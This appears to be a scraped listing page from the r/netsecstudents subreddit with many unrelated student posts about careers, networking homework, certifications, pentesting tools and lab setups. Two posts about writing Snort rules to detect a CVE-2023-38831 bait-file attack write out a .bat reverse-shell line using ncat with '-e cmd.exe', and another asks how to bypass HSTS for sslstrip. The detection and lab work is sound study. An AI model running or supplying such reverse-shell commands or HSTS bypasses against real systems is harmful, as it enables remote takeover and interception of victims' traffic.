/r/netsecstudents
A place to share resources, ask questions, and help other students learn Network Security specialties of all kinds.
Please read the rules before posting: https://www.reddit.com/r/netsecstudents/about/rules/
Hi everyone, I'm currently trying to detect a reverse TCP connection from W10 to Kali. The attack is initially based off CVE-2023-38831, where the bait file will run a .bat script once opened.
Currently, my .bat file looks like this:
echo off
ncat xx.xx.xx.xx 4444 -e cmd.exe
Now here's the problem: my alert rule is able to detect the attack, but when I change the alert to block, it does not seem to be able to block the attack. What should I do?
My alert rule:
alert tcp $HOME_NET 4444 -> $EXTERNAL_NET any (msg:"[MITRE ATT&CK T1204.002] User Execution: Malicious File"; sid:10000001; rev:1;)
I have a bachelor's in cybersecurity. However, my job is more of a Model-Based Systems Engineer, and I need to understand telecom, network and Linux more in depth.
I believe I may have to branch out of the cybersecurity degree and may have to get a Systems Engineering or Network Engineering degree.
Looking at below $10k because my employer only covers $3k for the entire year. Scholarships would be a great plus.
Hi everyone, I'm currently trying to detect a reverse TCP connection from W10 to Kali. The attack is initially based off CVE-2023-38831, where the bait file will run a .bat script once opened.
Currently, my .bat file looks like this:
echo off
ncat xx.xx.xx.xx 4444 -e cmd.exe
So here's the issue: I can't seem to think of anything to put in the content field for my Snort rule. I've tried ncat, (the ip), and others, but nothing seems to be alerting Snort. Do you guys have any idea as to how I can do it?
Here's my current rule:
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"[MITRE ATT&CK T1204.002] User Execution: Malicious File"; content:""; sid:10000001; rev:1;)
Thanks for reading!
Hello,
I am currently a freshman in college studying cybersecurity. I’ve been exploring different fields, and I’ve set myself the goal of becoming a Cloud Security Architect down the road. The field seems interesting and well-compensated to me.
I want to know what I need to be doing starting now and throughout my career to reach my goal of becoming a Cloud Security Architect and make the big bucks ($200k to 300k). I want to get started working on certifications to gain more skills/knowledge and get ahead of my peers, and to also set myself up to get an internship. Due to me being a freshman, I won’t be able to get an internship this summer, so I am doing summer sales. However, I want to get one in 2025. Also, I am set to graduate in 2.5 years, so my timeframe is less than a typical college student, so I want to spend my time effectively.
What are all the steps I need to take starting now to become a Cloud Security Architect?
Certifications to get from fundamental to advanced?
What is the typical career progression of roles/job titles from a fresh college graduate to an experienced architect?
If there's anyone who sees themselves as an 'ethical hacker', I'd really appreciate it if you could fill out this quick survey for a university research project. It should not take longer than 5 minutes!
https://erasmusuniversity.eu.qualtrics.com/jfe/form/SV_ebT25LJPWxVkVYq
All answers are guaranteed to be anonymous and the research will not be published, only shared within my uni.
I've read these stuffs: We've tried mobile data and different ISPs and the problem seems to persist.
https://maulwuff.de/research/ssl-debugging.html
Would SSL pinning fix this issue of very few clients getting an SSL error?
https://developers.wultra.com/components/ssl-pinning-android/1.3.x/documentation/
There is an option to install a CA cert on Android, but is it worth the hassle, or is there something simpler and more efficient?
I honestly don't understand why the hell I'm getting it, as it's rated A+ in ssllabs.
Just to note, I'm super new to networking.
I have this assignment where I have to make all the devices in this network be able to ping each other. So far the PCs in buildings 1 and 2 can ping each other and they can ping both the core and gateway router. But when I try to ping the server from the PCs I get the 'destination host unreachable' error. I have static routes that direct all traffic to the right interface on the gateway and core routers. (The server can ping the gateway router, and also FYI when I try to ping the PCs from the server it doesn't say 'destination unreachable', just 'request timed out'.)
Does anybody know what the problem is?
Hi everyone,
I have been offered a role as an Analyst on a Cyber Monitoring team. I have no technical CS background but have experience in information systems and business processes. I did well in my interview because I researched and conceptually understood the value of educating people and using certain safeguards to defend organizational information.
The role would be a pivot into a new field and I believe I would excel in reporting writing. This said, I am curious as to whether I would require a coding background/knowledge to really thrive and build a career in the space long term? What are your thoughts?
What is the career scope in defensive security? Please give me some suggestions about where should I start from and what are the things I need to learn?
I don't have much experience doing pen-testing but I'm working with sslstrip for a project and right at the end of this tutorial is where I'm stuck: https://www.geeksforgeeks.org/ssl-stripping-and-arp-spoofing-in-kali-linux/. I know sslstrip is kind of outdated due to the HSTS measures put into place for most websites now. I just want to prove sslstrip works, is there any way anybody knows a site that it will work on? Or any way to get around HSTS with another program or method?
Anyone know of a good comprehensive resource on wifi hacking/pentesting? I have found a few good resources but I don't think I've seen anything exhaustive that makes me feel secure in what I'm doing. I don't know if I need 1 or 2 wifi adapters for doing offensive attacks, I don't know if the wifi antennas should be completely vertical or bunny eared. I thought Alfa cards were the standard but then airgeddon told me that the Realtek chipset makes having two cards necessary.
Most importantly I felt like I only had partial information on the attacks. I was trying to attack several different networks with different configurations only to find that some attacks are not going to be done the way they logically should or maybe I'm an idiot. Anyway, I'm looking for something comprehensive.
Also if anyone knows of a good guide on setting up a WPA2 Enterprise AP/AD setup I'd really appreciate it. I want to practice this and I don't feel my previous setup was ideal.
Is there a way to set up each client that VPNs into a Meraki firewall to then be forwarded to their respective VLAN if there are multiple VLANs on the LAN? How would you go about configuring this? Thank you for the help as I think it is one critical thing to know.
This was a fever dream of an idea, but I know a lot of reversers/aspiring reversers frequent this sub, so I wanted to share.
Hi Everyone,
I'm working on a Cyber Security presentation. I was curious what the top concerns YTD were, and where some good places were to cite for research. I have general ideas about health care, and artificial intelligence, but I'm not really sure where to start looking.
Thanks!
Hey Everyone, I currently have an attempt scheduled for the Certified Network Pentester (CNPen) certification exam offered by the secops group, and due to a lack of reviews regarding the exam online, I just wanted to know reviews regarding the exam if anyone has attempted or passed this exam.
I am thinking about doing it. Right now I am working at an IT company but not in netsec, and I'd like to change my specialization to this field. I am looking for books or Udemy courses but can't find anything.
Hey r/netsecstudents,
I wanted to share with you a tool I recently developed called "RepoList":
https://github.com/Ademking/repolist
RepoList is a command-line tool I built to effortlessly create wordlists from GitHub repos for security testing:
🚀 Usage:
pip3 install repolist
repolist -u https://github.com/user/repo
Why?
Automates wordlist creation, perfect for pentesting or bug bounty programs. Use it with tools like ffuf or gobuster for enhanced testing. For example:
repolist -u "https://github.com/WordPress/WordPress" | ffuf -u "http://example.com/FUZZ" -w -
Give RepoList a try and let me know your thoughts and any feedback you might have. Happy hunting!
I've recently launched a beta version of XSSy which is a site where you can learn about cross-site scripting. There are a number of labs which you can experiment with, and when you have a working payload you can submit it to the headless browser and claim your place on the hall of fame. You can also create your own labs, to collaborate on tricky XSS scenarios you encounter.
Hey everyone I work currently in SEM Marketing making about 65k a year. Do you think it’s worth it for me to go back to school to learn Cyber Security? I’m interested but don’t want to make a lateral move money wise. Opinions?
TJ Null released a new list to help those preparing to take the PWK/OSCP. It is a much shorter list than it used to be, but for any alumni who want to go through old boxes for fun times he made new lists that align with older versions that reflect his preparation.
Here is the link to the new list: https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=273133724
Source: https://twitter.com/TJ_Null/status/1725510316484681935
Hey guys I'm a high school student interested in learning cloud sec and net sec as well. I'm asking that you guys guide me in a path for my learning. I would like anything that you guys recommend (how-tos, linux manpages, forums, etc..) pretty much anything. I'm really interested in this field and I want to do it in the future.